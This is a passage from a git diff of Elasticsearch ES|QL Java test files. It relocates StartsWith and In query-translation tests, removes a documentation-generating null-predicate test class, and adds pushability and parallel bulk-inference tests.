testLuceneQuery_NonFoldablePrefix_Translatable() { + var function = new StartsWith( + Source.EMPTY, + new FieldAttribute(Source.EMPTY, "field", new EsField("prefix", DataType.KEYWORD, Map.of(), true)), + Literal.keyword(Source.EMPTY, "a*b?c\\") + ); + + assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.YES)); + + var query = function.asQuery(LucenePushdownPredicates.DEFAULT, TranslatorHandler.TRANSLATOR_HANDLER); + + assertThat(query, equalTo(new WildcardQuery(Source.EMPTY, "field", "a\\*b\\?c\\\\*", false, false))); + } +} diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWithTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWithTests.java index c716457dd8378..e1d02472fca43 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWithTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWithTests.java @@ -11,22 +11,14 @@ import com.carrotsearch.randomizedtesting.annotations.ParametersFactory; import org.apache.lucene.util.BytesRef; -import org.elasticsearch.xpack.esql.capabilities.TranslationAware; import org.elasticsearch.xpack.esql.core.expression.Expression; -import org.elasticsearch.xpack.esql.core.expression.FieldAttribute; -import org.elasticsearch.xpack.esql.core.expression.Literal; -import org.elasticsearch.xpack.esql.core.querydsl.query.WildcardQuery; import org.elasticsearch.xpack.esql.core.tree.Source; import org.elasticsearch.xpack.esql.core.type.DataType; -import org.elasticsearch.xpack.esql.core.type.EsField; import org.elasticsearch.xpack.esql.expression.function.AbstractScalarFunctionTestCase; import org.elasticsearch.xpack.esql.expression.function.TestCaseSupplier; -import org.elasticsearch.xpack.esql.optimizer.rules.physical.local.LucenePushdownPredicates; -import org.elasticsearch.xpack.esql.planner.TranslatorHandler; import java.util.ArrayList; import java.util.List; -import java.util.Map; import java.util.function.Supplier; import static org.hamcrest.Matchers.equalTo; @@ -67,33 +59,4 @@ protected Expression build(Source source, List args) { return new StartsWith(source, args.get(0), args.get(1)); } - public void testLuceneQuery_AllLiterals_NonTranslatable() { - var function = new StartsWith(Source.EMPTY, Literal.keyword(Source.EMPTY, "test"), Literal.keyword(Source.EMPTY, "test")); - - assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.NO)); - } - - public void testLuceneQuery_NonFoldablePrefix_NonTranslatable() { - var function = new StartsWith( - Source.EMPTY, - new FieldAttribute(Source.EMPTY, "field", new EsField("field", DataType.KEYWORD, Map.of(), true)), - new FieldAttribute(Source.EMPTY, "field", new EsField("prefix", DataType.KEYWORD, Map.of(), true)) - ); - - assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.NO)); - } - - public void testLuceneQuery_NonFoldablePrefix_Translatable() { - var function = new StartsWith( - Source.EMPTY, - new FieldAttribute(Source.EMPTY, "field", new EsField("prefix", DataType.KEYWORD, Map.of(), true)), - Literal.keyword(Source.EMPTY, "a*b?c\\") - ); - - assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.YES)); - - var query = function.asQuery(LucenePushdownPredicates.DEFAULT, TranslatorHandler.TRANSLATOR_HANDLER); - - assertThat(query, equalTo(new WildcardQuery(Source.EMPTY, "field", "a\\*b\\?c\\\\*"))); - } } diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/WildcardLikeListTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/WildcardLikeListTests.java index cac1692f1a86e..78e4c951829d5 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/WildcardLikeListTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/WildcardLikeListTests.java @@ -11,6 +11,8 @@ import com.carrotsearch.randomizedtesting.annotations.ParametersFactory; import org.apache.lucene.util.BytesRef; +import org.elasticsearch.xpack.esql.EsqlTestUtils; +import org.elasticsearch.xpack.esql.capabilities.TranslationAware; import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.expression.FoldContext; import org.elasticsearch.xpack.esql.core.expression.Literal; @@ -22,12 +24,15 @@ import org.elasticsearch.xpack.esql.expression.function.FunctionName; import org.elasticsearch.xpack.esql.expression.function.TestCaseSupplier; import org.elasticsearch.xpack.esql.expression.function.scalar.string.regex.WildcardLikeList; +import org.elasticsearch.xpack.esql.optimizer.rules.physical.local.LucenePushdownPredicates; +import org.elasticsearch.xpack.esql.plugin.EsqlFlags; import java.util.ArrayList; import java.util.List; import java.util.function.Function; import java.util.function.Supplier; +import static org.elasticsearch.TransportVersions.V_8_17_0; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.startsWith; @@ -96,4 +101,20 @@ static Expression buildWildcardLikeList(Source source, List args) { ? new WildcardLikeList(source, expression, wildcardPatternList) : new WildcardLikeList(source, expression, wildcardPatternList, false)); } + + public void testNotPushableOverCanMatch() { + TranslationAware translatable = (TranslationAware) buildFieldExpression(testCase); + assertThat( + translatable.translatable(LucenePushdownPredicates.forCanMatch(V_8_17_0, new EsqlFlags(true))).finish(), + equalTo(TranslationAware.FinishedTranslatable.NO) + ); + } + + public void testPushable() { + TranslationAware translatable = (TranslationAware) buildFieldExpression(testCase); + assertThat( + translatable.translatable(LucenePushdownPredicates.from(new EsqlTestUtils.TestSearchStats(), new EsqlFlags(true))).finish(), + equalTo(TranslationAware.FinishedTranslatable.YES) + ); + } } diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/WildcardLikeTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/WildcardLikeTests.java index a9e9e5f917785..858d7235b2c70 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/WildcardLikeTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/WildcardLikeTests.java @@ -83,7 +83,7 @@ protected Expression build(Source source, List args) { return buildWildcardLike(source, args); } - static Expression buildWildcardLike(Source source, List args) { + Expression buildWildcardLike(Source source, List args) { Expression expression = args.get(0); Literal pattern = (Literal) args.get(1); Literal caseInsensitive = args.size() > 2 ? (Literal) args.get(2) : null; diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/predicate/operator/NullPredicatesTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/predicate/operator/NullPredicatesTests.java deleted file mode 100644 index 69bfcc99a21ea..0000000000000 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/predicate/operator/NullPredicatesTests.java +++ /dev/null @@ -1,181 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -package org.elasticsearch.xpack.esql.expression.predicate.operator; - -import org.elasticsearch.test.ESTestCase; -import org.elasticsearch.xpack.esql.core.expression.Expression; -import org.elasticsearch.xpack.esql.core.type.DataType; -import org.elasticsearch.xpack.esql.expression.function.AbstractFunctionTestCase; -import org.elasticsearch.xpack.esql.expression.function.DocsV3Support; -import org.elasticsearch.xpack.esql.expression.function.Example; -import org.elasticsearch.xpack.esql.expression.function.FunctionInfo; -import org.elasticsearch.xpack.esql.expression.function.Param; -import org.elasticsearch.xpack.esql.expression.function.scalar.convert.ToStringTests; -import org.junit.AfterClass; - -import java.util.LinkedHashMap; -import java.util.List; -import java.util.Map; - -/** - * In the documentation we document `IS NULL` and `IS NOT NULL` together. - */ -public class NullPredicatesTests extends ESTestCase { - public void testDummy() { - assert true; - } - - @AfterClass - public static void renderDocs() throws Exception { - if (System.getProperty("generateDocs") == null) { - return; - } - renderNullPredicate( - new DocsV3Support.OperatorConfig( - "predicates", - "IS NULL and IS NOT NULL", - TestNullPredicates.class, - DocsV3Support.OperatorCategory.UNARY - ) - ); - renderNullPredicate( - new DocsV3Support.OperatorConfig( - "is_null", - "IS NULL", - TestIsNullPredicate.class, - DocsV3Support.OperatorCategory.NULL_PREDICATES - ) - ); - renderNullPredicate( - new DocsV3Support.OperatorConfig( - "is_not_null", - "IS NOT NULL", - TestIsNotNullPredicate.class, - DocsV3Support.OperatorCategory.NULL_PREDICATES - ) - ); - } - - private static void renderNullPredicate(DocsV3Support.OperatorConfig op) throws Exception { - var docs = new DocsV3Support.OperatorsDocsSupport(op.name(), NullPredicatesTests.class, op, NullPredicatesTests::signatures); - docs.renderSignature(); - docs.renderDocs(); - } - - public static Map, DataType> signatures() { - // TODO: Verify the correct datatypes for this - Map, DataType> toString = AbstractFunctionTestCase.signatures(ToStringTests.class); - Map, DataType> results = new LinkedHashMap<>(); - for (var entry : toString.entrySet()) { - DataType dataType = entry.getKey().getFirst(); - results.put(List.of(dataType), DataType.BOOLEAN); - } - return results; - } - - /** - * This class only exists to provide FunctionInfo for the documentation - */ - public class TestNullPredicates { - @FunctionInfo( - returnType = {}, - description = "For NULL comparison use the `IS NULL` and `IS NOT NULL` predicates.", - examples = { @Example(file = "null", tag = "is-null"), @Example(file = "null", tag = "is-not-null") } - ) - public TestNullPredicates( - @Param( - name = "field", - type = { - "boolean", - "cartesian_point", - "cartesian_shape", - "date", - "date_nanos", - "double", - "geo_point", - "geo_shape", - "integer", - "ip", - "keyword", - "long", - "text", - "unsigned_long", - "version" }, - description = "Input value. The input can be a single- or multi-valued column or an expression." - ) Expression v - ) {} - } - - /** - * This class only exists to provide FunctionInfo for the documentation - */ - public class TestIsNullPredicate { - @FunctionInfo( - operator = "IS NULL", - returnType = {}, - description = "Use `IS NULL` to filter data based on whether the field exists or not.", - examples = { @Example(file = "null", tag = "is-null") } - ) - public TestIsNullPredicate( - @Param( - name = "field", - type = { - "boolean", - "cartesian_point", - "cartesian_shape", - "date", - "date_nanos", - "double", - "geo_point", - "geo_shape", - "integer", - "ip", - "keyword", - "long", - "text", - "unsigned_long", - "version" }, - description = "Input value. The input can be a single- or multi-valued column or an expression." - ) Expression v - ) {} - } - - /** - * This class only exists to provide FunctionInfo for the documentation - */ - public class TestIsNotNullPredicate { - @FunctionInfo( - operator = "IS NOT NULL", - returnType = {}, - description = "Use `IS NOT NULL` to filter data based on whether the field exists or not.", - examples = { @Example(file = "null", tag = "is-not-null") } - ) - public TestIsNotNullPredicate( - @Param( - name = "field", - type = { - "boolean", - "cartesian_point", - "cartesian_shape", - "date", - "date_nanos", - "double", - "geo_point", - "geo_shape", - "integer", - "ip", - "keyword", - "long", - "text", - "unsigned_long", - "version" }, - description = "Input value. The input can be a single- or multi-valued column or an expression." - ) Expression v - ) {} - } -} diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InStaticTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InStaticTests.java new file mode 100644 index 0000000000000..b2fa9f4221769 --- /dev/null +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InStaticTests.java @@ -0,0 +1,69 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.esql.expression.predicate.operator.comparison; + +import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.xpack.esql.core.expression.FieldAttribute; +import org.elasticsearch.xpack.esql.core.expression.FoldContext; +import org.elasticsearch.xpack.esql.core.expression.Literal; +import org.elasticsearch.xpack.esql.core.querydsl.query.TermsQuery; +import org.elasticsearch.xpack.esql.core.tree.Source; +import org.elasticsearch.xpack.esql.core.type.DataType; +import org.elasticsearch.xpack.esql.core.type.EsField; +import org.elasticsearch.xpack.esql.optimizer.rules.physical.local.LucenePushdownPredicates; +import org.elasticsearch.xpack.esql.planner.TranslatorHandler; + +import java.util.Arrays; +import java.util.Map; +import java.util.Set; + +import static org.elasticsearch.xpack.esql.EsqlTestUtils.L; +import static org.elasticsearch.xpack.esql.core.expression.Literal.NULL; +import static org.elasticsearch.xpack.esql.core.tree.Source.EMPTY; + +public class InStaticTests extends ESTestCase { + private static final Literal ONE = L(1); + private static final Literal TWO = L(2); + private static final Literal THREE = L(3); + + public void testInWithContainedValue() { + In in = new In(EMPTY, TWO, Arrays.asList(ONE, TWO, THREE)); + assertTrue((Boolean) in.fold(FoldContext.small())); + } + + public void testInWithNotContainedValue() { + In in = new In(EMPTY, THREE, Arrays.asList(ONE, TWO)); + assertFalse((Boolean) in.fold(FoldContext.small())); + } + + public void testHandleNullOnLeftValue() { + In in = new In(EMPTY, NULL, Arrays.asList(ONE, TWO, THREE)); + assertNull(in.fold(FoldContext.small())); + in = new In(EMPTY, NULL, Arrays.asList(ONE, NULL, THREE)); + assertNull(in.fold(FoldContext.small())); + + } + + public void testHandleNullsOnRightValue() { + In in = new In(EMPTY, THREE, Arrays.asList(ONE, NULL, THREE)); + assertTrue((Boolean) in.fold(FoldContext.small())); + in = new In(EMPTY, ONE, Arrays.asList(TWO, NULL, THREE)); + assertNull(in.fold(FoldContext.small())); + } + + public void testConvertedNull() { + In in = new In( + EMPTY, + new FieldAttribute(Source.EMPTY, "field", new EsField("suffix", DataType.KEYWORD, Map.of(), true)), + Arrays.asList(ONE, new Literal(Source.EMPTY, null, randomFrom(DataType.types())), THREE) + ); + var query = in.asQuery(LucenePushdownPredicates.DEFAULT, TranslatorHandler.TRANSLATOR_HANDLER); + assertEquals(new TermsQuery(EMPTY, "field", Set.of(1, 3)), query); + } + +} diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InTests.java index 449389accc37b..f56dcb220b6ca 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InTests.java @@ -13,32 +13,19 @@ import org.elasticsearch.geo.GeometryTestUtils; import org.elasticsearch.geo.ShapeTestUtils; import org.elasticsearch.xpack.esql.core.expression.Expression; -import org.elasticsearch.xpack.esql.core.expression.FieldAttribute; -import org.elasticsearch.xpack.esql.core.expression.FoldContext; -import org.elasticsearch.xpack.esql.core.expression.Literal; -import org.elasticsearch.xpack.esql.core.querydsl.query.TermsQuery; import org.elasticsearch.xpack.esql.core.tree.Source; import org.elasticsearch.xpack.esql.core.type.DataType; -import org.elasticsearch.xpack.esql.core.type.EsField; import org.elasticsearch.xpack.esql.expression.function.AbstractFunctionTestCase; import org.elasticsearch.xpack.esql.expression.function.TestCaseSupplier; -import org.elasticsearch.xpack.esql.optimizer.rules.physical.local.LucenePushdownPredicates; -import org.elasticsearch.xpack.esql.planner.TranslatorHandler; import org.junit.AfterClass; import java.util.ArrayList; -import java.util.Arrays; import java.util.List; import java.util.Locale; -import java.util.Map; -import java.util.Set; import java.util.function.Supplier; import java.util.stream.IntStream; -import static org.elasticsearch.xpack.esql.EsqlTestUtils.of; import static org.elasticsearch.xpack.esql.EsqlTestUtils.randomLiteral; -import static org.elasticsearch.xpack.esql.core.expression.Literal.NULL; -import static org.elasticsearch.xpack.esql.core.tree.Source.EMPTY; import static org.elasticsearch.xpack.esql.core.type.DataType.CARTESIAN_POINT; import static org.elasticsearch.xpack.esql.core.type.DataType.CARTESIAN_SHAPE; import static org.elasticsearch.xpack.esql.core.type.DataType.GEO_POINT; @@ -54,49 +41,6 @@ public InTests(@Name("TestCase") Supplier testCaseSup this.testCase = testCaseSupplier.get(); } - private static final Literal ONE = L(1); - private static final Literal TWO = L(2); - private static final Literal THREE = L(3); - - public void testInWithContainedValue() { - In in = new In(EMPTY, TWO, Arrays.asList(ONE, TWO, THREE)); - assertTrue((Boolean) in.fold(FoldContext.small())); - } - - public void testInWithNotContainedValue() { - In in = new In(EMPTY, THREE, Arrays.asList(ONE, TWO)); - assertFalse((Boolean) in.fold(FoldContext.small())); - } - - public void testHandleNullOnLeftValue() { - In in = new In(EMPTY, NULL, Arrays.asList(ONE, TWO, THREE)); - assertNull(in.fold(FoldContext.small())); - in = new In(EMPTY, NULL, Arrays.asList(ONE, NULL, THREE)); - assertNull(in.fold(FoldContext.small())); - - } - - public void testHandleNullsOnRightValue() { - In in = new In(EMPTY, THREE, Arrays.asList(ONE, NULL, THREE)); - assertTrue((Boolean) in.fold(FoldContext.small())); - in = new In(EMPTY, ONE, Arrays.asList(TWO, NULL, THREE)); - assertNull(in.fold(FoldContext.small())); - } - - private static Literal L(Object value) { - return of(EMPTY, value); - } - - public void testConvertedNull() { - In in = new In( - EMPTY, - new FieldAttribute(Source.EMPTY, "field", new EsField("suffix", DataType.KEYWORD, Map.of(), true)), - Arrays.asList(ONE, new Literal(Source.EMPTY, null, randomFrom(DataType.types())), THREE) - ); - var query = in.asQuery(LucenePushdownPredicates.DEFAULT, TranslatorHandler.TRANSLATOR_HANDLER); - assertEquals(new TermsQuery(EMPTY, "field", Set.of(1, 3)), query); - } - @ParametersFactory public static Iterable parameters() { List suppliers = new ArrayList<>(); diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/inference/InferenceOperatorTestCase.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/inference/InferenceOperatorTestCase.java index c49e301968aa0..25c8ffb7c34ee 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/inference/InferenceOperatorTestCase.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/inference/InferenceOperatorTestCase.java @@ -204,6 +204,11 @@ public Block eval(Page page) { return BlockUtils.deepCopyOf(page.getBlock(channel), blockFactory()); } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() { diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutorTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutorTests.java index 7e44c681c6fc4..03d07adbd87cd 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutorTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutorTests.java @@ -26,6 +26,8 @@ import java.util.ArrayList; import java.util.Iterator; import java.util.List; +import java.util.concurrent.CountDownLatch; +import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicReference; import static org.hamcrest.Matchers.allOf; @@ -61,7 +63,7 @@ public void shutdownThreadPool() { } public void testSuccessfulExecution() throws Exception { - List requests = randomInferenceRequestList(between(1, 1000)); + List requests = randomInferenceRequestList(between(1, 1_000)); List responses = randomInferenceResponseList(requests.size()); InferenceRunner inferenceRunner = mockInferenceRunner(invocation -> { @@ -141,6 +143,35 @@ public void testInferenceRunnerSometimesFails() throws Exception { }); } + public void testParallelBulkExecution() throws Exception { + int batches = between(50, 100); + CountDownLatch latch = new CountDownLatch(batches); + + for (int i = 0; i < batches; i++) { + runWithRandomDelay(() -> { + List requests = randomInferenceRequestList(between(1, 1_000)); + List responses = randomInferenceResponseList(requests.size()); + + InferenceRunner inferenceRunner = mockInferenceRunner(invocation -> { + runWithRandomDelay(() -> { + ActionListener l = invocation.getArgument(1); + l.onResponse(responses.get(requests.indexOf(invocation.getArgument(0, InferenceAction.Request.class)))); + }); + return null; + }); + + ActionListener> listener = ActionListener.wrap(r -> { + assertThat(r, equalTo(responses)); + latch.countDown(); + }, ESTestCase::fail); + + bulkExecutor(inferenceRunner).execute(requestIterator(requests), listener); + }); + } + + latch.await(10, TimeUnit.SECONDS); + } + private BulkInferenceExecutor bulkExecutor(InferenceRunner inferenceRunner) { return new BulkInferenceExecutor(inferenceRunner, threadPool, randomBulkExecutionConfig()); } @@ -195,11 +226,7 @@ private void runWithRandomDelay(Runnable runnable) { if (randomBoolean()) { runnable.run(); } else { - threadPool.schedule( - runnable, - TimeValue.timeValueNanos(between(1, 1_000)), - threadPool.executor(EsqlPlugin.ESQL_WORKER_THREAD_POOL_NAME) - ); + threadPool.schedule(runnable, TimeValue.timeValueNanos(between(1, 1_000)), threadPool.generic()); } } } diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/AbstractLogicalPlanOptimizerTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/AbstractLogicalPlanOptimizerTests.java index bff9843a89e1f..4263b8d07c8f2 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/AbstractLogicalPlanOptimizerTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/AbstractLogicalPlanOptimizerTests.java @@ -180,7 +180,7 @@ protected LogicalPlan plan(String query) { } protected LogicalPlan plan(String query, LogicalPlanOptimizer optimizer) { - var analyzed = analyzer.analyze(parser.createStatement(query)); + var analyzed = analyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG)); // System.out.println(analyzed); var optimized = optimizer.optimize(analyzed); // System.out.println(optimized); @@ -188,7 +188,7 @@ protected LogicalPlan plan(String query, LogicalPlanOptimizer optimizer) { } protected LogicalPlan planAirports(String query) { - var analyzed = analyzerAirports.analyze(parser.createStatement(query)); + var analyzed = analyzerAirports.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG)); // System.out.println(analyzed); var optimized = logicalOptimizer.optimize(analyzed); // System.out.println(optimized); @@ -196,7 +196,7 @@ protected LogicalPlan planAirports(String query) { } protected LogicalPlan planExtra(String query) { - var analyzed = analyzerExtra.analyze(parser.createStatement(query)); + var analyzed = analyzerExtra.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG)); // System.out.println(analyzed); var optimized = logicalOptimizer.optimize(analyzed); // System.out.println(optimized); @@ -204,11 +204,11 @@ protected LogicalPlan planExtra(String query) { } protected LogicalPlan planTypes(String query) { - return logicalOptimizer.optimize(analyzerTypes.analyze(parser.createStatement(query))); + return logicalOptimizer.optimize(analyzerTypes.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); } protected LogicalPlan planMultiIndex(String query) { - return logicalOptimizer.optimize(multiIndexAnalyzer.analyze(parser.createStatement(query))); + return logicalOptimizer.optimize(multiIndexAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); } @Override diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/LocalLogicalPlanOptimizerTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/LocalLogicalPlanOptimizerTests.java index f2b70c99253b8..0009b6ac897dc 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/LocalLogicalPlanOptimizerTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/LocalLogicalPlanOptimizerTests.java @@ -508,7 +508,7 @@ public void testSparseDocument() throws Exception { TEST_VERIFIER ); - var analyzed = analyzer.analyze(parser.createStatement(query)); + var analyzed = analyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG)); var optimized = logicalOptimizer.optimize(analyzed); var localContext = new LocalLogicalOptimizerContext(EsqlTestUtils.TEST_CFG, FoldContext.small(), searchStats); var plan = new LocalLogicalPlanOptimizer(localContext).localOptimize(optimized); @@ -785,7 +785,7 @@ private LocalRelation asEmptyRelation(Object o) { } private LogicalPlan plan(String query, Analyzer analyzer) { - var analyzed = analyzer.analyze(parser.createStatement(query)); + var analyzed = analyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG)); // System.out.println(analyzed); var optimized = logicalOptimizer.optimize(analyzed); // System.out.println(optimized); diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/LogicalPlanOptimizerTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/LogicalPlanOptimizerTests.java index 7795bf5c2d9ff..2cd28b817a184 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/LogicalPlanOptimizerTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/LogicalPlanOptimizerTests.java @@ -5254,20 +5254,26 @@ public void testEmptyMappingIndex() { TEST_VERIFIER ); - var plan = logicalOptimizer.optimize(analyzer.analyze(parser.createStatement("from empty_test"))); + var plan = logicalOptimizer.optimize(analyzer.analyze(parser.createStatement("from empty_test", EsqlTestUtils.TEST_CFG))); as(plan, LocalRelation.class); assertThat(plan.output(), equalTo(NO_FIELDS)); - plan = logicalOptimizer.optimize(analyzer.analyze(parser.createStatement("from empty_test metadata _id | eval x = 1"))); + plan = logicalOptimizer.optimize( + analyzer.analyze(parser.createStatement("from empty_test metadata _id | eval x = 1", EsqlTestUtils.TEST_CFG)) + ); as(plan, LocalRelation.class); assertThat(Expressions.names(plan.output()), contains("_id", "x")); - plan = logicalOptimizer.optimize(analyzer.analyze(parser.createStatement("from empty_test metadata _id, _version | limit 5"))); + plan = logicalOptimizer.optimize( + analyzer.analyze(parser.createStatement("from empty_test metadata _id, _version | limit 5", EsqlTestUtils.TEST_CFG)) + ); as(plan, LocalRelation.class); assertThat(Expressions.names(plan.output()), contains("_id", "_version")); plan = logicalOptimizer.optimize( - analyzer.analyze(parser.createStatement("from empty_test | eval x = \"abc\" | enrich languages_idx on x")) + analyzer.analyze( + parser.createStatement("from empty_test | eval x = \"abc\" | enrich languages_idx on x", EsqlTestUtils.TEST_CFG) + ) ); LocalRelation local = as(plan, LocalRelation.class); assertThat(Expressions.names(local.output()), contains(NO_FIELDS.get(0).name(), "x", "language_code", "language_name")); @@ -5962,7 +5968,7 @@ private void doTestSimplifyComparisonArithmetics( private void assertSemanticMatching(String expected, String provided) { BinaryComparison bc = extractPlannedBinaryComparison(provided); - LogicalPlan exp = analyzerTypes.analyze(parser.createStatement("FROM types | WHERE " + expected)); + LogicalPlan exp = analyzerTypes.analyze(parser.createStatement("FROM types | WHERE " + expected, EsqlTestUtils.TEST_CFG)); assertSemanticMatching(bc, extractPlannedBinaryComparison(exp)); } @@ -5990,7 +5996,7 @@ private Expression getComparisonFromLogicalPlan(LogicalPlan plan) { private void assertNotSimplified(String comparison) { String query = "FROM types | WHERE " + comparison; Expression optimized = getComparisonFromLogicalPlan(planTypes(query)); - Expression raw = getComparisonFromLogicalPlan(analyzerTypes.analyze(parser.createStatement(query))); + Expression raw = getComparisonFromLogicalPlan(analyzerTypes.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); assertTrue(raw.semanticEquals(optimized)); } @@ -6683,7 +6689,7 @@ public void testMultipleLookupShadowing() { public void testTranslateMetricsWithoutGrouping() { assumeTrue("requires snapshot builds", Build.current().isSnapshot()); var query = "TS k8s | STATS max(rate(network.total_bytes_in))"; - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); Limit limit = as(plan, Limit.class); Aggregate finalAggs = as(limit.child(), Aggregate.class); assertThat(finalAggs, not(instanceOf(TimeSeriesAggregate.class))); @@ -6704,7 +6710,7 @@ public void testTranslateMetricsWithoutGrouping() { public void testTranslateMixedAggsWithoutGrouping() { assumeTrue("requires snapshot builds", Build.current().isSnapshot()); var query = "TS k8s | STATS max(rate(network.total_bytes_in)), max(network.cost)"; - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); Limit limit = as(plan, Limit.class); Aggregate finalAggs = as(limit.child(), Aggregate.class); assertThat(finalAggs, not(instanceOf(TimeSeriesAggregate.class))); @@ -6729,7 +6735,7 @@ public void testTranslateMixedAggsWithoutGrouping() { public void testTranslateMixedAggsWithMathWithoutGrouping() { assumeTrue("requires snapshot builds", Build.current().isSnapshot()); var query = "TS k8s | STATS max(rate(network.total_bytes_in)), max(network.cost + 0.2) * 1.1"; - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); Project project = as(plan, Project.class); Eval mulEval = as(project.child(), Eval.class); assertThat(mulEval.fields(), hasSize(1)); @@ -6767,7 +6773,7 @@ public void testTranslateMixedAggsWithMathWithoutGrouping() { public void testTranslateMetricsGroupedByOneDimension() { assumeTrue("requires snapshot builds", Build.current().isSnapshot()); var query = "TS k8s | STATS sum(rate(network.total_bytes_in)) BY cluster | SORT cluster | LIMIT 10"; - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); TopN topN = as(plan, TopN.class); Aggregate aggsByCluster = as(topN.child(), Aggregate.class); assertThat(aggsByCluster, not(instanceOf(TimeSeriesAggregate.class))); @@ -6792,7 